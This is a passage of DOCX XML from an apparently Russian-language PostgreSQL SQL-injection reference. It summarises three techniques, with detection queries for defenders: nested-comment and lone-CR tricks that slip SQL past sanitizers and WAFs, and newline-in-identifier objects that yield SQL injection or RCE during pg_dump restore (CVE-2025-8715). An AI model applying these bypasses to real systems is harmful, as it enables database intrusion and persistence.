      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(10)</w:t>
      </w:r>
      <w:r>
        <w:t>-substrings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A852F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82AF8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory: CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R25.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695C9DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory: CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оригинальная уязвимость (исторический контекст регрессии).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6DA649" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GBHackers article: Critical PostgreSQL flaws August 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий обзор фикс-релизов 17.6/16.10/15.14/14.19/13.22.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890FC30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Identifiers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — quoted-identifier semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2783B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backup-tool reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF51238" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: psql — meta-commands `\!`, `\copy`, `\connect`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — chain-механика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C8C929" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9E311" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.12 разобраны три класса edge-case-атак через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсер комментариев и обработку newline в идентификаторах PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>. Это не «инъекции в классическом смысле», а тонкие отклонения PG-lexer от общесистемного SQL-поведения, которые создают gap-ы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8CD5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   **3.12.1 Вложенные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t>** — PG nested-aware (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xcdepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-counter); большинство sanitizer-ов non-nested. Sanitizer-ы Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.sub(r'/\*.*?\*/', '', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-greedy или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.DOTALL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> greedy — оба дают разный view payload-а, чем PG. Три payload-карточки (обход non-greedy, обход greedy, log-stripper evasion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371AEF28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.2 `--` и CR/LF/CRLF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG считает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>независимо</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> line-terminator-ами для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-комментария. Sanitizer, нормализующий только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или ищущий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как unit, пропускает одиночный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Один работающий payload (CR-only после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>); один анти-паттерн (Unicode line-separator не работает против PG); один variant Payload A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5595DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.3 Newline в идентификаторах (R25, CVE-2025-8715)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — second-order chain через pg_dump/restore. Атакующий создаёт role/table с newline в имени; pg_dump кладёт это в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-комментарий dump-script-а; psql при restore видит ломанный комментарий → SQL injection / RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Регрессия CVE-2012-0868, patched в 17.6/16.10/15.14/14.19/13.22 (август 2025). Три payload-карточки (RCE через psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>, SQL injection через pg_restore, COMMENT-payload в plpgsql-функции).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163324D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Сравнение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9479F" w14:paraId="1BC6B045"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58D86D8"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17AE243" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Уязвимая поверхность</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246FD5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Тип атаки</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8725DCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Когда активируется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6858832" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Patch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="73BBF7E8"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51332" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.12.1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9E2D9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sanitizer/log-stripper non-nested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48F90A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Input bypass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86CB06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Сразу при отправке payload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278F93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a (lexer behavior)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0636EE58"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2262A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.12.2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2EDBA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sanitizer не учитывающий одиночный </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\r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ADB112" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Input bypass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6ECEE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Сразу при отправке payload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03C205" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a (lexer behavior)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2F16A6BC"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62661D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.12.3 (R25)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F4063B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pg_dump quoted-identifier handling</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9FD8E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Second-order chain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50FD19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>При restore (часы/дни позже)</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A6021" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.6, 16.10, 15.14, 14.19, 13.22 (август 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13074CDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ключевое отличие 3.12.3 от 3.12.1/3.12.2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>временной gap между setup и активацией</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Setup может быть через legitimate операцию (CREATE ROLE для нового user-а), активация — через legitimate backup/restore процедуру. Detection требует audit на сторонах </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обеих</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> операций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CC0EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2253F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.12 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>транспортные приёмы</w:t>
      </w:r>
      <w:r>
        <w:t>, не самостоятельные атаки. Сами по себе они не извлекают данные; они обеспечивают доставку payload-а через специфические pipeline-edge-cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFBD49E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.1 или 3.12.2 как обход input-фильтра</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий протаскивает SQL через sanitizer/WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7718797A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1/3.6/3.7/3.10 как downstream-атака</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после прохода через 3.12-обход, payload активирует UNION-leak, OOB, RCE или DML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F9337D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.3 как long-term persistence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий с минимальным CREATE-правом ставит «бомбу замедленного действия»: имя объекта с embedded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>. Активируется при следующем backup-restore-cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338E0C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.12.3 особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypass-ит большинство runtime-защит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: WAF не видит SQL atтак (нет HTTP-payload-а), audit-логи не показывают anomalous query (setup — обычный CREATE), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не записывает payload (нет execution). Detection — только на уровне inventory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68133B9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT rolname FROM pg_authid WHERE position(chr(10) IN rolname) &gt; 0 OR position(chr(13) IN rolname) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поиск newline-в-rolname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E2997A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT relname FROM pg_class WHERE position(chr(10) IN relname) &gt; 0 OR position(chr(13) IN relname) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поиск newline-в-relname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426B3F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT description FROM pg_description WHERE description ~ E'\n\\\\!'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поиск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в comment-ах объектов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD1D721" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36D7C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries) vs 3.12.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.12.2 может проталкивать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-разделённый payload, но stacked-queries-block extended-protocol-уровневый, не sanitizer-уровневый. 3.12 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parser-а, 3.5 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wire-protocol</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F005EAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (Filter bypass) vs 3.12.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.9 — encoding tricks (hex, U&amp;, E-strings); 3.12 — lexer edge cases (nested comments, CR-only). Параллельные классы; часто комбинируются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D294F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql) vs 3.12.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.16 — server-side через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>; 3.12.3 — client-side через pg_dump-сериализацию. Разные точки в pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216664FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 (COPY FROM PROGRAM) vs 3.12.3 Payload A.</w:t>
